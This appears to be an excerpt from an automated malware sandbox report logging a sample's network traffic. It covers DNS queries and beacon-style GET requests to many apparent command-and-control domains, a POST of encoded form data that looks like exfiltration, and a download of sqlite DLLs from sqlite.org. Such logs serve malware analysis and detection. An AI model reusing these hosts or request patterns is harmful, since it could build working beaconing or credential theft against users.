bc 23 c6 e8 03 a2 15 31 60 95 11 eb a0 96 15 ad bb e0 ba 35 5f ae ea ac 5d cc ca e4 c3 ed 8d 48 de 0c 02 e7 6b 65 85 0f 58 88 70 e2 e5 f1 08 04 14 4a 4b 22 35 99 17 1f ea 4e be 2b 2c b8 a0 fc 14 95 f5 da d1 d5 29 64 ad 51 04 6a a1 e4 67 dd 63 b3 c0 85 9c c9 0f 84 d9 94 0a 7e ce bb 06 7f c4 60 60 ac 59 8c 15 59 28 34 6f 31 ef e4 e3 12 7b 11 c9 cd 48 9f 5f 1b ce 7a c2 1b dc ae c6 a2 f3 2f b0 bc f5 94 05 e0 9d b2 c8 52 c2 79 dc d7 81 f5 93 35 57 59 1d aa e4 8c e6 b0 17 5e 11 f6 1c c7 4c 8c 55 92 de fb 49 bc 28 53 03 e0 10 4a 99 a5 11 49 b1 ce f1 3a 09 8c c9 a3 85 17 b9 5f ae 82 76 22 45 c1 4a d7 71 5a f4 d7 56 65 47 5d 99 92 67 6a 8c 48 0c 58 8f 93 19 7b ff 19 61 5a bd b7 cc 93 0c d3 b1 06 3a 7f 54 af b0 16 23 0a 24 fc a3 48 cb 8b 71 68 c7 4a 45 d6 9a c6 40 49 4e ee 0a cf 69 01 5b 38 68 65 72 d4 83 d0 f3 08 7c 69 e1 e0 39 fe 94 89 49 44 65 6c c8 9d eb ba 25 8b b2 39 34 aa 2a 02 fe 06 8a 4c e2 e0 49 fd c2 03 c8 07 2c 49 cf 3a ae 92 f6 ac ef 21 8c 9d 95 68 d3 5e 14 8a 89 67 ec 10 12 df 52 3c b1 2a c4 34 da e0 75 c6 2a 6f cc 4c 3e 06 45 47 7b 9b 8a 7a d3 d9 2
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 09 Oct 2024 10:53:50 GMTserver: Apacheset-cookie: __tad=1728471230.5861187; expires=Sat, 07-Oct-2034 10:53:50 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 582content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f db e1 c9 33 2f ac 60 32 49 38 04 1d 57 1d e4 05 57 4b 36 c8 76 a6 97 7d fe 33 b1 e8 fa 86 fc f9 03 f8 f5 28 6c 7d 9f de 4e 74 7d 46 24 7b e5 bc d8 97 72 35 c0 64 83 e2 d1 52 fc e4 6e 7a 3e 7d 5d 5c 5e 66 20 f8 be 4f c0 58 59 c7 68 ed 90 f8 cb f7 30 a4 fa 7c f2 e8 c8 c3 0c 6b 53 72 d0 e0 b1 1b 6b 7a 5d 2e af e6 b3 b9 5c bc 87 13 30 7a 00 31 6d bc 1a 03 7a bd 91 a6 31 36 0f af aa e1 09 c1 0f 2e 2f 67 c3 c3 63 9b 95 6a 0f 03 37 8f 4a e5 b8 fb e3 12 b4 d1 b8 8a 8a 4c 40 6d b1 ca 5f 33 c6 7e 20 16 51 f1 a9 51 72 07 35 5a 1c e6 55 13 da 2c 15 7c 8d 58 86 c5 b4 19 4d 65 2d 12 57 e7 ba 37 f8 bb 57 fb 3c 64 21 7e 01 75 08 3c 47 c4 c4 3c 9c ad e0 e7 ed b7 fc 95 e2 ef fc 65 bd d4 e7 1c 7c 00 43 1e fe 8b f1 07 e8 99 28 63 38 04 00 00 Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 09 Oct 2024 10:53:53 GMTserver: Apacheset-cookie: __tad=1728471233.2398229; expires=Sat, 07-Oct-2034 10:53:53 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 582content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f db e1 c9 33 2f ac 60 32 49 38 04 1d 57 1d e4 05 57 4b 36 c8 76 a6 97 7d fe 33 b1 e8 fa 86 fc f9 03 f8 f5 28 6c 7d 9f de 4e 74 7d 46 24 7b e5 bc d8 97 72 35 c0 64 83 e2 d1 52 fc e4 6e 7a 3e 7d 5d 5c 5e 66 20 f8 be 4f c0 58 59 c7 68 ed 90 f8 cb f7 30 a4 fa 7c f2 e8 c8 c3 0c 6b 53 72 d0 e0 b1 1b 6b 7a 5d 2e af e6 b3 b9 5c bc 87 13 30 7a 00 31 6d bc 1a 03 7a bd 91 a6 31 36 0f af aa e1 09 c1 0f 2e 2f 67 c3 c3 63 9b 95 6a 0f 03 37 8f 4a e5 b8 fb e3 12 b4 d1 b8 8a 8a 4c 40 6d b1 ca 5f 33 c6 7e 20 16 51 f1 a9 51 72 07 35 5a 1c e6 55 13 da 2c 15 7c 8d 58 86 c5 b4 19 4d 65 2d 12 57 e7 ba 37 f8 bb 57 fb 3c 64 21 7e 01 75 08 3c 47 c4 c4 3c 9c ad e0 e7 ed b7 fc 95 e2 ef fc 65 bd d4 e7 1c 7c 00 43 1e fe 8b f1 07 e8 99 28 63 38 04 00 00 Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 09 Oct 2024 10:53:55 GMTserver: Apacheset-cookie: __tad=1728471235.8409754; expires=Sat, 07-Oct-2034 10:53:55 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 582content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f db e1 c9 33 2f ac 60 32 49 38 04 1d 57 1d e4 05 57 4b 36 c8 76 a6 97 7d fe 33 b1 e8 fa 86 fc f9 03 f8 f5 28 6c 7d 9f de 4e 74 7d 46 24 7b e5 bc d8 97 72 35 c0 64 83 e2 d1 52 fc e4 6e 7a 3e 7d 5d 5c 5e 66 20 f8 be 4f c0 58 59 c7 68 ed 90 f8 cb f7 30 a4 fa 7c f2 e8 c8 c3 0c 6b 53 72 d0 e0 b1 1b 6b 7a 5d 2e af e6 b3 b9 5c bc 87 13 30 7a 00 31 6d bc 1a 03 7a bd 91 a6 31 36 0f af aa e1 09 c1 0f 2e 2f 67 c3 c3 63 9b 95 6a 0f 03 37 8f 4a e5 b8 fb e3 12 b4 d1 b8 8a 8a 4c 40 6d b1 ca 5f 33 c6 7e 20 16 51 f1 a9 51 72 07 35 5a 1c e6 55 13 da 2c 15 7c 8d 58 86 c5 b4 19 4d 65 2d 12 57 e7 ba 37 f8 bb 57 fb 3c 64 21 7e 01 75 08 3c 47 c4 c4 3c 9c ad e0 e7 ed b7 fc 95 e2 ef fc 65 bd d4 e7 1c 7c 00 43 1e fe 8b f1 07 e8 99 28 63 38 04 00 00 Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8
        Source: C:\Windows\SysWOW64\schtasks.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3270000[1].zipJump to behavior
        Source: global trafficHTTP traffic detected: GET /qw71/?op9=BLtTm0V&jnQX=+N/0E0v6NJCVb806DMB0CZmH+23dphvoX4nqdcW8deD1xdZOlnbQi9bOuP5MTQFhk1MFTYVpuSFcpFTZFESSLFlEbVNSdqMunFXh13AQ5nMFb0g8ejQn+jENhOCu HTTP/1.1Host: www.itemsort.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /2019/sqlite-dll-win32-x86-3270000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /t7t4/?jnQX=JME/FbwkkQiTLR8Hpq6D7hdkRf4IpbxJ+vLJvTOCgHppMKWbYWfaTBHe/9olNtMnBFYydrc5qS+BY9eInbnUEE+fai2nxgmrSKR1Lz1Vur11jq7KYWpx7HNZ/+DB&op9=BLtTm0V HTTP/1.1Host: www.rudemyvague.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /9vaq/?jnQX=iWdqg5dx+nxgXMJv6fkLiwcVGHqfo0uT2/zaY5dN5WRtbG72PfYUoC7d90JyyrKd7ng9xxty1D2HdVJ8v/8coxWlMdmEcT26SfoT6cgNzC3qUmeIqeviCd2ntANB&op9=BLtTm0V HTTP/1.1Host: www.gws-treinamento2.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /hshp/?jnQX=MBiESr0hPmgVFuSAv2RW9BnB0CPkTLgBjfLus90OagNghP1boqy5EEnwCusO605/Nd6O3rIecQF22GSlnaUjHXYI37VLW/n7sB3aQUqxecNcJ9xp5B3u2xIsMloC&op9=BLtTm0V HTTP/1.1Host: www.sailforever.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /bd77/?op9=BLtTm0V&jnQX=qUcYNRi6MmsiGKrh9NCA2amnhNOWcK/IcWj4n4RDTJ9SK0tIDWNU88L5d2vVfSnlJTsqAOrwZWsiYZ0lCIKh+05AxDn9xcp1Qtj0O+O6OKrHR59mj2SDK4c9wfNV HTTP/1.1Host: www.launchdreamidea.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /t10u/?jnQX=z2kOE6Hdw1U1MLXklDyp9Yeiaynt+oJtvvr0x5hWEi4SF2SHBGm8iJVVQ9fey1U/CoztigTmFBDjEJBprUmgmj56JVnqLqZmNm1dTZL5G96LsAIGFczAt5NVhqxy&op9=BLtTm0V HTTP/1.1Host: www.mondayigboleague.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /0bvj/?jnQX=JoV24jQMdS4/3i4C2Azs6HkIa5jkTaNy+Ik40cffOJE8Oz5kZb+e9PwZtqgkJTMo0IB+xAx5/WHdbF25CbK7oeKf/9ddGNs9w6nA5aUYEeZWEqUjEZt1tayRpXZ5&op9=BLtTm0V HTTP/1.1Host: www.stocksm.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /v2k8/?jnQX=XThEFIcSG6Rk+ek7c8+em164NM7RE7zsg7f4UZ5pblIcrBlS4WXKWr830TKyJQKZuaIDwmyKi1LLwtKiy3gv2K3CAz8zZZIYsqZVYXDMbAsgSXM6eWVqobGzrSjZ&op9=BLtTm0V HTTP/1.1Host: www.drevohome.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /1juc/?jnQX=Sd7Ig8sUf85GUDOd+69y7q8ASEJkpRiPhIDwYHX4t/HDftDJcaAUQz0Nk1YScc8PwXRpFHVhI0pUMDPk3EzgwMmR193QTxiRUXmZ38pZMEafFZRyFsF28n3zyVCi&op9=BLtTm0V HTTP/1.1Host: www.givingaway123.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /qxse/?jnQX=rpts+huSPQ+pmLEfVBJQXPKHPF6QGptJ0LqkryefQtnAbXwhGMtosN0vN05C67pBp4rQA57+jRSPBKniSAxaDdWt3qORG9yS0W8xsQ/JiARutE+hlRtDJ7/I/ECM&op9=BLtTm0V HTTP/1.1Host: www.jagdud.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /y045/?op9=BLtTm0V&jnQX=y1BC7gE5U9SjKVi7QbOvAwWuygTbNwJMs/YJXs1dmV0xz4NUECnrSGc1HY+X/o4eGLvG/kHjylnkJsIYeylKQW6IjjpW3QwsGL9rSqTC02R0siCnxO5Xuy1NPmql HTTP/1.1Host: www.030002837.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /m7sk/?jnQX=A6wDktXN+q8LbGsFPTQ5fgxpwOHTOb7uN87t6JZMO+a4oYZs/QR9CToB2Y/CtBMOuGHP8Si8k7ziAUqpJpPf4pft+7Iw80pztuVlLOvkrpZ1moT/MaasSpctb8+L&op9=BLtTm0V HTTP/1.1Host: www.ethetf.digitalAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /12c7/?jnQX=rkKrlAe8PM32Rlyo3XGhAGHv/PebKrU9ljR3Eqrj5cYHYbO4IgL/tGu5VYz7wugWP81CfRwkkbYRscbYiAGJC2F8RXw04VbxiTu+G9foPjo3PMuVsrJsiyJ6G7sg&op9=BLtTm0V HTTP/1.1Host: www.booosted.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
        Source: global trafficDNS traffic detected: DNS query: www.itemsort.shop
        Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
        Source: global trafficDNS traffic detected: DNS query: www.rudemyvague.info
        Source: global trafficDNS traffic detected: DNS query: www.gws-treinamento2.shop
        Source: global trafficDNS traffic detected: DNS query: www.sailforever.xyz
        Source: global trafficDNS traffic detected: DNS query: www.launchdreamidea.xyz
        Source: global trafficDNS traffic detected: DNS query: www.mondayigboleague.info
        Source: global trafficDNS traffic detected: DNS query: www.stocksm.fun
        Source: global trafficDNS traffic detected: DNS query: www.drevohome.shop
        Source: global trafficDNS traffic detected: DNS query: www.givingaway123.net
        Source: global trafficDNS traffic detected: DNS query: www.jagdud.store
        Source: global trafficDNS traffic detected: DNS query: www.030002837.xyz
        Source: global trafficDNS traffic detected: DNS query: www.ethetf.digital
        Source: global trafficDNS traffic detected: DNS query: www.booosted.xyz
        Source: global trafficDNS traffic detected: DNS query: www.djazdgc.tokyo
        Source: unknownHTTP traffic detected: POST /t7t4/ HTTP/1.1Host: www.rudemyvague.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enOrigin: http://www.rudemyvague.infoReferer: http://www.rudemyvague.info/t7t4/Content-Length: 2161Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36Data Raw: 6a 6e 51 58 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 56 6b 51 42 70 76 43 53 37 54 5a 65 59 2f 30 50 75 73 5a 55 38 4f 75 72 76 44 4b 39 76 30 51 62 61 6f 4b 6d 4f 77 58 37 44 67 2f 4e 6a 2f 56 35 43 39 49 44 50 56 55 48 51 37 49 35 70 6d 79 6d 62 6f 48 63 71 37 79 51 4f 6e 71 63 50 53 69 71 6a 54 36 70 64 2b 6f 74 48 52 42 71 72 35 5a 39 6b 36 33 2b 42 30 5a 58 2b 6c 56 6b 75 2b 75 73 62 33 4e 55 6c 38 51 54 30 54 56 51 30 72 77 48 7a 65 34 6c 78 43 36 79 31 59 42 2f 33 63 6e 75 43 41 63 57 55 56 58 43 61 62 75 46 4f 76 61 6c 42 56 41 71 4d 4f 4d 6e 41 30 49 6d 35 66 6c 33 5a 32 56 7a 5a 6b 38 55 6f 46 39 30 62 4e 72 4f 54 56 75 62 37 68 65 33 71 70 6a 42 6a 31 6f 4e 74 65 6c 71 59 76 32 74 42 63 6c 61 64 2f 39 76 42 46 54 71 4a 69 57 6d 79 77 6e 6e 72 6d 67 35 73 33 74 57 51 42 32 5a 32 63 5a 6e 76 67 44 51 31 46 41 30 5a 4d 57 74 65 57 46 34 71 7a 6d 4c 66 44 62 4d 4a 66 54 47 34 6f 58 47 6f 7a 73 79 44 57 44 2b 56 6e 7a 56 46 44 71 30 4c 45 4b 35 7a 53 2f 4b 48 65 66 72 50 63 6c 6d 42 67 36 41 49 4c 6e 53 74 30 2f 2f 7a 65 7a 61 37 43 4f 70 32 46 53 4d 77 30 77 52 56 44 4f 6b 38 2f 55 33 79 30 78 2b 56 57 45 33 43 6a 75 31 59 76 4b 64 37 50 47 48 50 73 33 72 4a 64 34 75 6b 4c 5a 72 47 52 4d 47 4d 54 58 63 71 45 50 35 70 55 54 49 6d 73 51 2b 2f 49 4e 76 77 77 65 58 56 34 54 37 49 2f 36 4c 77 47 51 59 79 31 43 4b 49 4b 49 70 61 64 4c 7a 61 55 50 4f 70 6c 71 37 55 32 50 58 31 79 44 37 35 4d 51 52 71 63 7a 4f 6d 36 63 57 51 70 43 74 66 59 54 68 48 5a 63 64 73 44 46 53 77 43 75 4f 6e 2b 41 4c 6a 6e 31 33 31 71 61 59 4e 78 2f 56 6c 79 31 44 74 77 69 71 4f 6d 6f 4b 4c 64 65 34 6a 56 5a 51 53 52 7a 56 44 36 4f 4e 47 4f 37 45 36 30 2f 44 2b 66 78 30 33 35 53 35 66 76 62 68 59 79 65 59 7a 4b 44 33 2f 4b 61 6e 4b 44 6e 32 6e 63 31 41 6e 71 59 49 4c 71 6d 6a 54 64 70 4b 36 5a 38 2f 51 72 72 64 77 6d 32 64 41 6d 52 48 38 4a 39 47 59 34 71 75 5a 79 39 6b 6f 76 51 57 77 39 34 37 39 57 41 33 39 34 65 61 6e 4b 4d 44 63 43 66 62 31 6e 2f 4c 58 33 64 48 32 78 4d 6f 32 71 6a 34 32 4d 30 58 76 53 52 2b 39 6d 55 36 52 4b 6e 4f 58 65 2f 6f 6b 68 6a 56 5a 71 33 4f 43 4c 32 49 50 4d 44 6a 71 78 4f 52 5a 63 74 50 68 42 66 79 4b 42 49 57 70 51 48 35 35 55 4f 58 2b 6b 6b 36 33 57 6a 31 37 73 71 68 58 67 53 49 6d 7a 56 42 58 2b 43 4b 56 4d 74 44 4a 6c 42 46 51 30 4b 76 34 45 41 67 50 53 78 66 56 41 55 43 65 72 52 35 67 50 2b 74 42 51 58 53 38 63 6f 4e 4c 76 34 51 62 44 30 30 76 39 65 42 45 76 68 50 76 50 46 41 65 71 53 44 42
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 10:54:04 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
